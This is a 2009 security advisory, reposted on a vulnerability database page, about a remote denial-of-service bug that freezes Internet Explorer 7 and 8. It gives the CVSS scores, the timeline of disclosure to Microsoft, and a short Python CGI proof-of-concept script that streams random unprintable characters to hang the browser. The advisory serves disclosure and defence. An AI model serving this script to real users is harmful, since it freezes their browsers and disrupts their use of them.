Remote DoS in Internet Explorer 7 / 8

2009.04.20
Credit: Nam Nguyen
Risk: Medium
Local: No
Remote: Yes


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

BLUE MOON SECURITY ADVISORY 2009-04 =================================== :Title: Remote Denial of Service in Internet Explorer :Severity: Moderate :Reporter: Blue Moon Consulting :Products: Internet Explorer 7 and 8 :Fixed in: -- Description ----------- We could not find out the definitive description for Internet Explorer from Microsoft website. This is our own understanding of the application: Internet Explorer is a web browser. We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8. When visit a malicious page, the browser may freeze indefinitely and killing it in Task Manager is required. With IE8's default settings, killing the tab process simply launches another process and goes to the same malicious page, hence repeating the cycle. The root cause is unknown to us. We suspect that it is related to the display of unprintable characters on Windows XP, and Vista. The same problem does not occur in Windows 7. Microsoft has classified this vulnerability as a stability (not security) issue and will be addressing it in the next version of the application. Workaround ---------- There is no workaround. Fix --- This problem is to be fixed in the next version of Internet Explorer. Disclosure ---------- Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors. :Initial vendor contact: March 19, 2009: Initial contact sent to secure (at) microsoft (dot) com. [email concealed] :Vendor response: March 19, 2009: Tony replied stating the preference for PGP communication. :Further communication: March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME format. March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and informed us of a new case manager, Jack. March 21, 2009: We further reported that IE 8 was affected by the same bug, in PGP MIME format. March 30, 2009: We asked if Microsoft had received our PoC. March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could not reproduce the behavior of this bug. April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista Business. Sent in PGP MIME format. April 01, 2009: Jack said the email was stripped out and asked us to resend. April 02, 2009: We resent the last email in plain text. April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in no case did Internet Explorer hang indefinitely. April 06, 2009: We sent Jack a video clip, in PGP MIME format. April 06, 2009: Jack asked us to resend because the email was stripped again. April 07, 2009: We resent the clip in plain text to Jack. April 09, 2009: Jack acknowledged the receipt and let us know the bug would be fixed in the next version of Internet Explorer. April 09, 2009: We asked for a confirmation of bug classification. April 09, 2009: Jack confirmed this bug was classified as stability, instead of a security issue. We therefore decided to release this advisory to the public. :Public disclosure: April 11, 2009 :Exploit code: The following CGI script causes IE to hang indefinitely. :: #!C:/python25/python import sys import random CHAR_SET = [chr(x) for x in range(0x20)] CHAR_SET += [chr(x) for x in range(128, 256)] def send_file(): l = 800000 + 4096 print "Content-Type: text/plain" print "Content-Length: %d" % l print "Cache-Control: no-cache, no-store, must-revalidate" # this is not standardized, but use it anyway print "Pragma: no-cache" print "" # bypass IE download dialog sys.stdout.write("a" * 4096) # print junks for i in xrange(l): sys.stdout.write(random.choice(CHAR_SET)) sys.exit() send_file() Disclaimer ---------- The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. Cheers -- Nam Nguyen Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn

References:

http://www.securityfocus.com/archive/1/archive/1/502617/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top